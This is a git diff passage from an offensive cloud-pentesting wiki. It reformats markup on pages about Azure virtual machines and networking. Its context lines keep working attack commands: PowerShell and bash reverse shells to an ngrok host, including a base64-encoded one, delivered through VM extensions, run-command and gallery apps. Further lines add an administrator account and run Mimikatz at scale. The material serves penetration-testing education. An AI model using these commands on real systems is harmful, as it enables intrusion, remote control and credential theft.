 echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -551,11 +532,9 @@ az vm extension set \
   --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
 
 ```
-{% endcode %}
 
-* Execute reverse shell from file
+- Execute reverse shell from file
 
-{% code overflow="wrap" %}
 ```bash
 az vm extension set \
   --resource-group  \
@@ -566,21 +545,19 @@ az vm extension set \
   --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
   --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
 ```
-{% endcode %}
 
 You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
 
-* Reset password using the VMAccess extension
+- Reset password using the VMAccess extension
 
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Relevant VM extensions
 
@@ -592,13 +569,11 @@ The required permission is still **`Microsoft.Compute/virtualMachines/extensions
 
 This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
 
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
-{% endcode %}
 
 
 
@@ -668,7 +643,6 @@ This is a VM extension that would allow to execute runbooks in VMs from an autom
 
 These are packages with all the **application data and install and uninstall scripts** that can be used to easily add and remove application in VMs.
 
-{% code overflow="wrap" %}
 ```bash
 # List all galleries in resource group
 az sig list --resource-group  --output table
@@ -676,33 +650,32 @@ az sig list --resource-group  --output table
 # List all apps in a fallery
 az sig gallery-application list --gallery-name  --resource-group  --output table
 ```
-{% endcode %}
 
 These are the paths were the applications get downloaded inside the file system:
 
-* Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux//`
-* Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\\`
+- Linux: `/var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux//`
+- Windows: `C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\\`
 
 Check how to install new applications in [https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli)
 
-{% hint style="danger" %}
-It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.
-{% endhint %}
+> [!CAUTION]
+> It's possible to **share individual apps and galleries with other subscriptions or tenants**. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.
 
 But there **isn't a "marketplace" for vm apps** like there is for extensions.
 
 The permissions required are:
 
-* `Microsoft.Compute/galleries/applications/write`
-* `Microsoft.Compute/galleries/applications/versions/write`
-* `Microsoft.Compute/virtualMachines/write`
-* `Microsoft.Network/networkInterfaces/join/action`
-* `Microsoft.Compute/disks/write`
+- `Microsoft.Compute/galleries/applications/write`
+- `Microsoft.Compute/galleries/applications/versions/write`
+- `Microsoft.Compute/virtualMachines/write`
+- `Microsoft.Network/networkInterfaces/join/action`
+- `Microsoft.Compute/disks/write`
 
 Exploitation example to execute arbitrary commands:
 
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group myResourceGroup \
@@ -737,10 +710,11 @@ az vm application set \
    --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
    --treat-deployment-as-failure true
 ```
-{% endtab %}
 
-{% tab title="Windows" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group  \
@@ -779,9 +753,9 @@ az vm application set \
    --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
    --treat-deployment-as-failure true
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### User data
 
@@ -791,12 +765,12 @@ This is **persistent data** that can be retrieved from the metadata endpoint at
 
 It's possible to pass some data to the VM that will be stored in expected paths:
 
-* In **Windows** custom data is placed in `%SYSTEMDRIVE%\AzureData\CustomData.bin` as a binary file and it isn't processed.
-* In **Linux** it was stored in `/var/lib/waagent/ovf-env.xml` and now it's stored in `/var/lib/waagent/CustomData/ovf-env.xml`
-  * **Linux agent**: It doesn't process custom data by default, a custom image with the data enabled is needed
-  * **cloud-init:** By default it processes custom data and this data may be in [**several formats**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). It could execute a script easily sending just the script in the custom data.
-    * I tried that both Ubuntu and Debian execute the script you put here.
-    * It's also not needed to enable user data for this to be executed.
+- In **Windows** custom data is placed in `%SYSTEMDRIVE%\AzureData\CustomData.bin` as a binary file and it isn't processed.
+- In **Linux** it was stored in `/var/lib/waagent/ovf-env.xml` and now it's stored in `/var/lib/waagent/CustomData/ovf-env.xml`
+  - **Linux agent**: It doesn't process custom data by default, a custom image with the data enabled is needed
+  - **cloud-init:** By default it processes custom data and this data may be in [**several formats**](https://cloudinit.readthedocs.io/en/latest/explanation/format.html). It could execute a script easily sending just the script in the custom data.
+    - I tried that both Ubuntu and Debian execute the script you put here.
+    - It's also not needed to enable user data for this to be executed.
 
 ```bash
 #!/bin/sh
@@ -807,8 +781,9 @@ echo "Hello World" > /var/tmp/output.txt
 
 This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs**. The needed permission is `Microsoft.Compute/virtualMachines/runCommand/action`.
 
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Execute rev shell
 az vm run-command invoke \
@@ -820,10 +795,11 @@ az vm run-command invoke \
 # revshell.sh file content
 echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
 ```
-{% endtab %}
 
-{% tab title="Windows" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
 # Execute a rev shell
@@ -840,7 +816,7 @@ echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",1
 ## In Package file link just add any link to a blobl storage file
 export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
 
-# The content of 
+# The content of
 echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
 
 
@@ -848,51 +824,38 @@ echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
 Import-module MicroBurst.psm1
 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Privilege Escalation
 
-{% content-ref url="../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md" %}
-[az-virtual-machines-and-network-privesc.md](../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+{{#endref}}
 
 ## Unauthenticated Access
 
-{% content-ref url="../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md" %}
-[az-vms-unath.md](../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
+{{#endref}}
 
 ## Post Exploitation
 
-{% content-ref url="../../az-post-exploitation/az-vms-and-network-post-exploitation.md" %}
-[az-vms-and-network-post-exploitation.md](../../az-post-exploitation/az-vms-and-network-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-post-exploitation/az-vms-and-network-post-exploitation.md
+{{#endref}}
 
 ## Persistence
 
-{% content-ref url="../../az-persistence/az-vms-persistence.md" %}
-[az-vms-persistence.md](../../az-persistence/az-vms-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-persistence/az-vms-persistence.md
+{{#endref}}
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
-* [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
-* [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
+- [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview)
+- [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/)
+- [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md b/src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
similarity index 77%
rename from pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
rename to src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
index 83208cca7..e0b769a4a 100644
--- a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
+++ b/src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
@@ -1,19 +1,6 @@
 # Az - Azure Network
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -29,17 +16,17 @@ By default all subnets within the same Azure Virtual Network (VNet) **can commun
 
 **Example:**
 
-* `MyVNet` with an IP address range of 10.0.0.0/16.
-  * **Subnet-1:** 10.0.0.0/24 for web servers.
-  * **Subnet-2:** 10.0.1.0/24 for database servers.
+- `MyVNet` with an IP address range of 10.0.0.0/16.
+  - **Subnet-1:** 10.0.0.0/24 for web servers.
+  - **Subnet-2:** 10.0.1.0/24 for database servers.
 
 ### Enumeration
 
 To list all the VNets and subnets in an Azure account, you can use the Azure Command-Line Interface (CLI). Here are the steps:
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List VNets
 az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"
@@ -47,22 +34,22 @@ az network vnet list --query "[].{name:name, location:location, addressSpace:add
 # List subnets of a VNet
 az network vnet subnet list --resource-group  --vnet-name  --query "[].{name:name, addressPrefix:addressPrefix}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List VNets
 Get-AzVirtualNetwork | Select-Object Name, Location, @{Name="AddressSpace"; Expression={$_.AddressSpace.AddressPrefixes}}
 
 # List subnets of a VNet
-Get-AzVirtualNetwork -ResourceGroupName  -Name  | 
-Select-Object -ExpandProperty Subnets | 
+Get-AzVirtualNetwork -ResourceGroupName  -Name  |
+Select-Object -ExpandProperty Subnets |
 Select-Object Name, AddressPrefix
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Network Security Groups (NSG)
 
@@ -72,14 +59,14 @@ NSGs can be associated to **subnets and NICs.**
 
 **Rules example:**
 
-* An inbound rule allowing HTTP traffic (port 80) from any source to your web servers.
-* An outbound rule allowing only SQL traffic (port 1433) to a specific destination IP address range.
+- An inbound rule allowing HTTP traffic (port 80) from any source to your web servers.
+- An outbound rule allowing only SQL traffic (port 1433) to a specific destination IP address range.
 
 ### Enumeration
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List NSGs
 az network nsg list --query "[].{name:name, location:location}" -o table
@@ -91,24 +78,25 @@ az network nsg rule list --nsg-name  --resource-group  -ResourceGroupName 
 
 # Get NSG rules
-(Get-AzNetworkSecurityGroup -ResourceGroupName  -Name ).SecurityRules 
+(Get-AzNetworkSecurityGroup -ResourceGroupName  -Name ).SecurityRules
 
 # Get NICs and subnets using this NSG
 (Get-AzNetworkSecurityGroup -Name  -ResourceGroupName ).Subnets
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
+
 ## Azure Firewall
 
 Azure Firewall is a **managed network security service** in Azure that protects cloud resources by inspecting and controlling traffic. It is a **stateful firewall** that filters traffic based on rules for Layers 3 to 7, supporting communication both **within Azure** (east-west traffic) and **to/from external networks** (north-south traffic). Deployed at the **Virtual Network (VNet) level**, it provides centralized protection for all subnets in the VNet. Azure Firewall automatically scales to handle traffic demands and ensures high availability without requiring manual setup.
@@ -127,9 +115,9 @@ It is available in three SKUs—**Basic**, **Standard**, and **Premium**, each t
 
 ### Enumeration
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Azure Firewalls
 az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table
@@ -143,10 +131,10 @@ az network firewall application-rule collection list --firewall-name  --resource-group  --query "[].{name:name, rules:rules}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Azure Firewalls
 Get-AzFirewall
@@ -160,21 +148,21 @@ Get-AzFirewall
 # Get nat rules of a firewall
 (Get-AzFirewall -Name  -ResourceGroupName ).NatRuleCollections
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Azure Route Tables
 
-Azure **Route Tables** are used to control the routing of network traffic within a  subnet. They define rules that specify how packets should be forwarded, either to Azure resources, the internet, or a specific next hop like a Virtual Appliance or Azure Firewall. You can associate a route table with a **subnet**, and all resources within that subnet will follow the routes in the table.
+Azure **Route Tables** are used to control the routing of network traffic within a subnet. They define rules that specify how packets should be forwarded, either to Azure resources, the internet, or a specific next hop like a Virtual Appliance or Azure Firewall. You can associate a route table with a **subnet**, and all resources within that subnet will follow the routes in the table.
 
 **Example:** If a subnet hosts resources that need to route outbound traffic through a Network Virtual Appliance (NVA) for inspection, you can create a **route** in a route table to redirect all traffic (e.g., `0.0.0.0/0`) to the NVA's private IP address as the next hop.
 
 ### **Enumeration**
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Route Tables
 az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
@@ -182,10 +170,10 @@ az network route-table list --query "[].{name:name, resourceGroup:resourceGroup,
 # List routes for a table
 az network route-table route list --route-table-name  --resource-group  --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Route Tables
 Get-AzRouteTable
@@ -193,18 +181,18 @@ Get-AzRouteTable
 # List routes for a table
 (Get-AzRouteTable -Name  -ResourceGroupName ).Routes
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
+
 ## Azure Private Link
 
 Azure Private Link is a service in Azure that **enables private access to Azure services** by ensuring that **traffic between your Azure virtual network (VNet) and the service travels entirely within Microsoft's Azure backbone network**. It effectively brings the service into your VNet. This setup enhances security by not exposing the data to the public internet.
 
 Private Link can be used with various Azure services, like Azure Storage, Azure SQL Database, and custom services shared via Private Link. It provides a secure way to consume services from within your own VNet or even from different Azure subscriptions.
 
-{% hint style="danger" %}
-NSGs do not apply to private endpoints, which clearly means that associating an NSG with a subnet that contains the Private Link will have no effect.
-{% endhint %}
+> [!CAUTION]
+> NSGs do not apply to private endpoints, which clearly means that associating an NSG with a subnet that contains the Private Link will have no effect.
 
 **Example:**
 
@@ -212,9 +200,9 @@ Consider a scenario where you have an **Azure SQL Database that you want to acce
 
 ### **Enumeration**
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Private Link Services
 az network private-link-service list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
@@ -222,10 +210,10 @@ az network private-link-service list --query "[].{name:name, location:location,
 # List Private Endpoints
 az network private-endpoint list --query "[].{name:name, location:location, resourceGroup:resourceGroup, privateLinkServiceConnections:privateLinkServiceConnections}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Private Link Services
 Get-AzPrivateLinkService | Select-Object Name, Location, ResourceGroupName
@@ -233,9 +221,9 @@ Get-AzPrivateLinkService | Select-Object Name, Location, ResourceGroupName
 # List Private Endpoints
 Get-AzPrivateEndpoint | Select-Object Name, Location, ResourceGroupName, PrivateEndpointConnections
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Azure Service Endpoints
 
@@ -247,9 +235,9 @@ For instance, an **Azure Storage** account by default is accessible over the pub
 
 ### **Enumeration**
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Virtual Networks with Service Endpoints
 az network vnet list --query "[].{name:name, location:location, serviceEndpoints:serviceEndpoints}" -o table
@@ -257,42 +245,42 @@ az network vnet list --query "[].{name:name, location:location, serviceEndpoints
 # List Subnets with Service Endpoints
 az network vnet subnet list --resource-group  --vnet-name  --query "[].{name:name, serviceEndpoints:serviceEndpoints}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Virtual Networks with Service Endpoints
 Get-AzVirtualNetwork
 
 # List Subnets with Service Endpoints
-(Get-AzVirtualNetwork -ResourceGroupName  -Name ).Subnets 
+(Get-AzVirtualNetwork -ResourceGroupName  -Name ).Subnets
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### Differences Between Service Endpoints and Private Links
 
 Microsoft recommends using Private Links in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-network/vnet-integration-for-azure-services#compare-private-endpoints-and-service-endpoints):
 
-

+

 
 **Service Endpoints:**
 
-* Traffic from your VNet to the Azure service travels over the Microsoft Azure backbone network, bypassing the public internet.
-* The endpoint is a direct connection to the Azure service and does not provide a private IP for the service within the VNet.
-* The service itself is still accessible via its public endpoint from outside your VNet unless you configure the service firewall to block such traffic.
-* It's a one-to-one relationship between the subnet and the Azure service.
-* Less expensive than Private Links.
+- Traffic from your VNet to the Azure service travels over the Microsoft Azure backbone network, bypassing the public internet.
+- The endpoint is a direct connection to the Azure service and does not provide a private IP for the service within the VNet.
+- The service itself is still accessible via its public endpoint from outside your VNet unless you configure the service firewall to block such traffic.
+- It's a one-to-one relationship between the subnet and the Azure service.
+- Less expensive than Private Links.
 
 **Private Links:**
 
-* Private Link maps Azure services into your VNet via a private endpoint, which is a network interface with a private IP address within your VNet.
-* The Azure service is accessed using this private IP address, making it appear as if it's part of your network.
-* Services connected via Private Link can be accessed only from your VNet or connected networks; there's no public internet access to the service.
-* It enables a secure connection to Azure services or your own services hosted in Azure, as well as a connection to services shared by others.
-* It provides more granular access control via a private endpoint in your VNet, as opposed to broader access control at the subnet level with service endpoints.
+- Private Link maps Azure services into your VNet via a private endpoint, which is a network interface with a private IP address within your VNet.
+- The Azure service is accessed using this private IP address, making it appear as if it's part of your network.
+- Services connected via Private Link can be accessed only from your VNet or connected networks; there's no public internet access to the service.
+- It enables a secure connection to Azure services or your own services hosted in Azure, as well as a connection to services shared by others.
+- It provides more granular access control via a private endpoint in your VNet, as opposed to broader access control at the subnet level with service endpoints.
 
 In summary, while both Service Endpoints and Private Links provide secure connectivity to Azure services, **Private Links offer a higher level of isolation and security by ensuring that services are accessed privately without exposing them to the public internet**. Service Endpoints, on the other hand, are easier to set up for general cases where simple, secure access to Azure services is required without the need for a private IP in the VNet.
 
@@ -308,9 +296,9 @@ Imagine you have a globally distributed application with users all around the wo
 
 ### Enumeration
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Azure Front Door Instances
 az network front-door list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
@@ -318,10 +306,10 @@ az network front-door list --query "[].{name:name, resourceGroup:resourceGroup,
 # List Front Door WAF Policies
 az network front-door waf-policy list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Azure Front Door Instances
 Get-AzFrontDoor
@@ -329,9 +317,9 @@ Get-AzFrontDoor
 # List Front Door WAF Policies
 Get-AzFrontDoorWafPolicy -Name  -ResourceGroupName 
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Azure Application Gateway and Azure Application Gateway WAF
 
